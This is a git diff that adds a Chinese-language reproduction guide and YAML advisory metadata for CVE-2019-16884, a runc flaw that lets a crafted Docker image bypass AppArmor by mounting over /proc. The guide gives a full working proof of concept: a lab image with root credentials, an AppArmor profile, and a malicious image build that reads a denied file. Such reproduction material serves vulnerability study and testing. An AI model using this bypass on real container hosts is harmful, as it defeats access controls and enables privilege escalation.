diff --git a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md new file mode 100644 index 0000000000000000000000000000000000000000..0c8d3f4237505186f24fd993037f538837afd024 --- /dev/null +++ b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md @@ -0,0 +1,68 @@ +# CVE-2019-16884 + +PoC for CVE-2019-16884 +### 简介 +apparmor 可以让管理员通过程序的配置文件限制程序的功能,其本身作为一个内核模块集成在 Linux 内核中 +(可能发现 lsmod 里面并没有 apparmor,这是因为 lsmod 展示的是所有动态加载的内核模块, +通过 ls /sys/module/ 就可以看到所有的内核模块包括系统中内置的),因此其通过内核提供强访问控制。 + +CVE-2019-16884 可以使得用户绕过 apparmor 的一些策略进而可以实现一些提权操作。 + +``` +cat /sys/module/apparmor/parameters/enabled # 查看是否开启apparmor,返回为Y表示开启 +sudo cat /sys/kernel/security/apparmor/profiles # 查看加载的配置文件 +``` +### 构建实验环境 + +``` +> docker run -it ssst0n3/docker_archive:CVE-2019-16884 + +ubuntu login: root +Password: root +``` +### 漏洞复现 +#### 1、创建apparmor规则 + +``` +> cat > /etc/apparmor.d/no_flag < +profile no_flag flags=(attach_disconnected,mediate_deleted) { + #include + file, + deny /flag r, +} +EOF +``` + +#### 2、创建一个flag文件 +``` +echo "Al1ex is comming" > /tmp/flag +``` + +#### 3、应用规则 +``` +/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag +``` + +#### 4、检测,启动一个正常镜像此时无权限读取/flag内容3 +``` +docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag busybox cat /flag +``` + +#### 5、利用漏洞启用一个恶意镜像,可以读取/flag +``` +> mkdir -p rootfs/proc/self/{attr,fd} +> touch rootfs/proc/self/{status,attr/exec} +> touch rootfs/proc/self/fd/{4,5} +> cat < Dockerfile +FROM busybox +ADD rootfs / +VOLUME /proc +EOF +> docker build -t apparmor-bypass . +> docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag apparmor-bypass cat /flag +``` + +通过上述步骤即可完成漏洞的复现 + diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml new file mode 100644 index 0000000000000000000000000000000000000000..0f38b7149b264c59bb0cdb25337e642a9d9b21a9 --- /dev/null +++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml @@ -0,0 +1,25 @@ +id: CVE-2019-16884 +source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md +info: + name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. + severity: high + description: | + runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory + scope-of-influence: + Red Hat Enterprise Linux 8 + Red Hat Enterprise Linux 7 Extras + Red Hat OpenShift Container Platform 4.1 + Red Hat OpenShift Container Platform 4.2 + Red Hat OpenShift Container Platform 3.9 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 + - https://usn.ubuntu.com/usn/usn-4297-1 + - https://security.netapp.com/advisory/ntap-20220221-0004/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2019-16884 + cwe-id: CWE-863 + cnvd-id: None + kve-id: None + tags: privilege escalation \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index eae3bac29caa1c55f3195b6adfcb2e4802fc7aea..5d280333b36e54c5ad800210a6a94f083cf0ca4a 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -1,6 +1,7 @@ #此收录漏洞列表为非openKylin发行版用例。 cve: linux-kernel: + - CVE-2019-16884 - CVE-2021-33909 - CVE-2021-3493 - CVE-2022-0995